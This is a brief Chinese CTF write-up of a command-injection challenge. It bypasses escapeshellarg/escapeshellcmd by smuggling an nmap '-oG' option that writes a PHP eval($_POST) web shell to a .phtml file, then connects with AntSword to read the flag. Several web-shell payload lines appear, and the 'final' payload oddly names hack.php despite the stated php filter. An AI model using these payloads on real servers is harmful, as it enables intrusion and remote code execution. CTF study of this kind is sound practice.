这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。
' <?=eval($_POST[a]);?> -oG 1.phtml '
1. 这个应该也是有那两个函数。
说的是哪两个函数呢?就是escapeshellarg与escapeshellcmd两个函数啦,去我博客里搜这两个关键词应该可以搜得到,
我的博客
然后就是老套路了,先用猜测得payload实验
' <?php eval($_POST["hack"]); ?> -oG hack.php '
然后就提示了
这种情况不要急,几番猜测下来,是过滤了php。那我们就用phtml啊,然后我们把一句话的代码换成短标签,最终得payload为
' <?=eval($_POST["hack"]); ?> -oG hack.php '
蚁剑一连,然后在主目录下发现flag。
2.我所犯的错误
我这次复现并不是一开始就是对的,开始的话因为空格和单引号的问题错了几次,就像下面。
导致这两次没解析成功,后面参考了别人得博客才成功,细节啊。